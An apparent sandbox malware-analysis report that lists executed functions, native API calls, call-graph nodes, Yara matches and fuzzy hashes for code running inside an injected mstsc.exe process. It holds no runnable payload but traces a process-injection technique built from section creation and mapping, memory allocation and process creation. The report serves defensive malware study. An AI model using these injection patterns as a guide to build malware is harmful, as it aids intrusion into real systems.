LdrInitializeThunk 121236->121239 121237 9a5c3 121237->121225 121239->121237 121241 9af30 121240->121241 121242 9a7bf LookupPrivilegeValueW 121241->121242 121242->121008 121244 9a24c 121243->121244 121247 229fed0 LdrInitializeThunk 121244->121247 121245 9a26b 121245->121009 121247->121245 121249 8f3ac 121248->121249 121296 8f290 121249->121296 121252 8f3d9 121254 8f3e4 121252->121254 121256 9a460 NtClose 121252->121256 121253 8f3f1 121255 8f402 121253->121255 121257 9a460 NtClose 121253->121257 121254->120970 121255->120970 121256->121254 121257->121255 121259 8f43c 121258->121259 121260 8f290 2 API calls 121259->121260 121261 8f45f 121260->121261 121262 8f469 121261->121262 121263 8f481 121261->121263 121264 8f474 121262->121264 121266 9a460 NtClose 121262->121266 121265 8f492 121263->121265 121267 9a460 NtClose 121263->121267 121264->120973 121265->120973 121266->121264 121267->121265 121269 8caa6 121268->121269 121271 8cab0 121268->121271 121269->120981 121270 8cb74 121270->120981 121271->121270 121272 94a50 7 API calls 121271->121272 121273 8cbe5 121272->121273 121273->120981 121275 8d646 121274->121275 121307 8d310 121275->121307 121277 8d6ac 121277->120992 121280 88d14 121278->121280 121332 8f6d0 121278->121332 121291 88f25 121280->121291 121336 943a0 121280->121336 121282 88d70 121282->121291 121339 88ab0 121282->121339 121285 9cf00 RtlAllocateHeap 121286 88db2 121285->121286 121287 9d030 2 API calls 121286->121287 121292 88dc7 121287->121292 121288 87ea0 3 API calls 121288->121292 121291->120961 121292->121288 121292->121291 121293 8c7b0 17 API calls 121292->121293 121294 88160 LdrInitializeThunk 121292->121294 121344 8f670 121292->121344 121348 8f080 20 API calls 121292->121348 121293->121292 121294->121292 121295->120997 121297 8f2aa 121296->121297 121301 8f360 121296->121301 121302 99f50 121297->121302 121300 9a460 NtClose 121300->121301 121301->121252 121301->121253 121303 99f6c 121302->121303 121306 22a07ac LdrInitializeThunk 121303->121306 121304 8f354 121304->121300 121306->121304 121308 8d327 121307->121308 121313 8f710 121308->121313 121312 8d39b 121312->121277 121314 8f735 121313->121314 121324 881a0 121314->121324 121316 8d36f 121321 9a6b0 121316->121321 121317 8f759 121317->121316 121318 94a50 7 API calls 121317->121318 121320 9bd90 RtlFreeHeap 121317->121320 121331 8f550 CreateProcessInternalW LdrInitializeThunk 121317->121331 121318->121317 121320->121317 121322 9a6b6 121321->121322 121323 9a6cf CreateProcessInternalW 121322->121323 121323->121312 121325 8829f 121324->121325 121326 881b5 121324->121326 121325->121317 121326->121325 121327 94a50 7 API calls 121326->121327 121328 88222 121327->121328 121329 9bd90 RtlFreeHeap 121328->121329 121330 88249 121328->121330 121329->121330 121330->121317 121331->121317 121333 8f6ef 121332->121333 121334 8f6fd 121333->121334 121335 8f6f6 SetErrorMode 121333->121335 121334->121280 121335->121334 121338 943c6 121336->121338 121349 8f4a0 121336->121349 121338->121282 121340 9bd10 NtAllocateVirtualMemory 121339->121340 121343 88ad5 121339->121343 121340->121343 121341 88cea 121341->121285 121343->121341 121366 99850 121343->121366 121345 8f683 121344->121345 121401 99e60 121345->121401 121348->121292 121350 8f4bd 121349->121350 121356 99f90 121350->121356 121353 8f505 121353->121338 121357 99fac 121356->121357 121364 229ffb4 LdrInitializeThunk 121357->121364 121358 8f4fe 121358->121353 121360 99fe0 121358->121360 121361 99ffc 121360->121361 121365 229fc60 LdrInitializeThunk 121361->121365 121362 8f52e 121362->121338 121364->121358 121365->121362 121367 9bf60 RtlAllocateHeap 121366->121367 121368 99867 121367->121368 121385 89310 121368->121385 121370 99882 121371 998a9 121370->121371 121372 998c0 121370->121372 121373 9bd90 RtlFreeHeap 121371->121373 121375 9bd10 NtAllocateVirtualMemory 121372->121375 121374 998b6 121373->121374 121374->121341 121376 998fa 121375->121376 121377 9bd10 NtAllocateVirtualMemory 121376->121377 121378 99913 121377->121378 121379 99ba0 121378->121379 121382 99bb4 121378->121382 121380 9bd90 RtlFreeHeap 121379->121380 121381 99baa 121380->121381 121381->121341 121383 9bd90 RtlFreeHeap 121382->121383 121384 99c09 121383->121384 121384->121341 121386 89335 121385->121386 121388 8938d 121386->121388 121389 8cf20 121386->121389 121388->121370 121390 8cf4c 121389->121390 121391 8cf6c 121390->121391 121396 9a1f0 121390->121396 121391->121388 121393 8cf8f 121393->121391 121394 9a460 NtClose 121393->121394 121395 8cfca 121394->121395 121395->121388 121397 9a20c 121396->121397 121400 229fbb8 LdrInitializeThunk 121397->121400 121398 9a227 121398->121393 121400->121398 121402 99e7c 121401->121402 121405 229fd8c LdrInitializeThunk 121402->121405 121403 8f6ae 121403->121292 121405->121403 121406 229f900 LdrInitializeThunk 121407 99050 121408 9bd10 NtAllocateVirtualMemory 121407->121408 121410 9908b 121407->121410 121408->121410 121409 9916c 121410->121409 121411 990f0 Sleep 121410->121411 121411->121410

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 0204A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtQueryInformationProcess.NTDLL ref: 0204A19F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InformationProcessQuery
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 1778838933-4108050209
                                                                                                                                                                                    • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                                    • Instruction ID: e880982bb4e0d1262c6be74b72f90859b8195051fa30bacdecf19363ee2df9e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF11270A18A8C8FDBA9EF68C894AEEB7E1FF98304F40462AD44ED7250DF349545DB41
                                                                                                                                                                                    Function 02049BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 209 2049baf-2049bfe call 2049102 212 2049c00 209->212 213 2049c0c-2049c9a call 204b942 * 2 NtCreateSection 209->213 214 2049c02-2049c0a 212->214 219 2049ca0-2049d0a call 204b942 NtMapViewOfSection 213->219 220 2049d5a-2049d68 213->220 214->213 214->214 223 2049d52 219->223 224 2049d0c-2049d4c 219->224 223->220 226 2049d4e-2049d4f 224->226 227 2049d69-2049d6b 224->227 226->223 228 2049d6d-2049d72 227->228 229 2049d88-2049ddc call 204cd62 NtClose 227->229 230 2049d74-2049d86 call 2049172 228->230 230->229
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Section$CloseCreateView
                                                                                                                                                                                    • String ID: @$@
                                                                                                                                                                                    • API String ID: 1133238012-149943524
                                                                                                                                                                                    • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                                    • Instruction ID: 81db94dbf18e7da32b16be6ac007113409f81ca75482582d1b27177d1a53b693
                                                                                                                                                                                    • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55617170518B4C8FCB58EF58D8856AABBE0FB98314F50462EE58AC3651DF35D441CB86
                                                                                                                                                                                    Function 02049BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 268 2049bb2-2049bef 269 2049bf7-2049bfe 268->269 270 2049bf2 call 2049102 268->270 271 2049c00 269->271 272 2049c0c-2049c9a call 204b942 * 2 NtCreateSection 269->272 270->269 273 2049c02-2049c0a 271->273 278 2049ca0-2049d0a call 204b942 NtMapViewOfSection 272->278 279 2049d5a-2049d68 272->279 273->272 273->273 282 2049d52 278->282 283 2049d0c-2049d4c 278->283 282->279 285 2049d4e-2049d4f 283->285 286 2049d69-2049d6b 283->286 285->282 287 2049d6d-2049d72 286->287 288 2049d88-2049ddc call 204cd62 NtClose 286->288 289 2049d74-2049d86 call 2049172 287->289 289->288
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Section$CreateView
                                                                                                                                                                                    • String ID: @$@
                                                                                                                                                                                    • API String ID: 1585966358-149943524
                                                                                                                                                                                    • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                    • Instruction ID: 2c1e80ea03cda8a728c236f522e311cd303939e1b33d311c323313b54eaa9dd8
                                                                                                                                                                                    • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                    • Instruction Fuzzy Hash: E3517EB0618B088FCB58DF58D8956AABBE0FB88314F50462EE98AC3651DF35D541CB86
                                                                                                                                                                                    Function 0204A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtQueryInformationProcess.NTDLL ref: 0204A19F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InformationProcessQuery
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 1778838933-4108050209
                                                                                                                                                                                    • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                    • Instruction ID: 32b14849d006e4c294f941cc625b1fc6beccd04ce1b5d530e774b62cd0a604ce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF514EB0918A8C8FDBA9EF68C8946EEB7F5FB98304F40462ED44AD7250DF309645DB41
                                                                                                                                                                                    Function 0009A330 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 569 9a330-9a381 call 9af30 NtCreateFile
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A37D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: .z`
                                                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                    • Instruction ID: 9485ad54f96afe5341ad736c9d384f84903a0002a59b5b52263d74decdbc4af1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F0B2B2211208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                                                    Function 0009A3E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 572 9a3e0-9a3f6 573 9a3fc-9a429 NtReadFile 572->573 574 9a3f7 call 9af30 572->574 574->573
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A425
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID: 1J
                                                                                                                                                                                    • API String ID: 2738559852-2845985182
                                                                                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                    • Instruction ID: ed44a675b617bd3db82fc8b14b58137a535d62411a471b13865e22f32db39a27
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158259BE1D97241DA30E811CBA0
                                                                                                                                                                                    Function 0009A3DC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 575 9a3dc-9a429 call 9af30 NtReadFile
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A425
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID: 1J
                                                                                                                                                                                    • API String ID: 2738559852-2845985182
                                                                                                                                                                                    • Opcode ID: 32f93a41399eba2e5e869b44a503e5fb648a2b791349a3ff4947db602cf1b5fd
                                                                                                                                                                                    • Instruction ID: 08a580170d0fc60a34a26b34ae166f2594ebd40694aff7a5f6e5159cf6d1a98c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 32f93a41399eba2e5e869b44a503e5fb648a2b791349a3ff4947db602cf1b5fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F01DB6210045AFCB04DF98D890CEB7BA9AF8D314B05829DF95C97201C530E855CBA0
                                                                                                                                                                                    Function 0009A460 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtClose.NTDLL(PM,?,?,00094D50,00000000,FFFFFFFF), ref: 0009A485
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close
                                                                                                                                                                                    • String ID: PM
                                                                                                                                                                                    • API String ID: 3535843008-2952166990
                                                                                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                    • Instruction ID: ed9d2910e13bd0b8bc4f380d45e1098f0e9f4163baf3e5d73bda02a158b23ee7
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9ED012762102146BDB10EBD8CC45ED7775CEF44750F154455BA185B242C530F50086E0
                                                                                                                                                                                    Function 0009A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A549
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                    • Instruction ID: b0f267d14870df2895e22410e5c1ac42993de72ff2289dbaf79f75324fbca76b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF015B2210208ABCB14DF89CC81EEB77ADAF88754F118159BE0897241C630F811CBE0
                                                                                                                                                                                    Function 022A00C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                    Function 022A07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                                    Function 0229FAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                                    Function 0229FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                    Function 0229FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
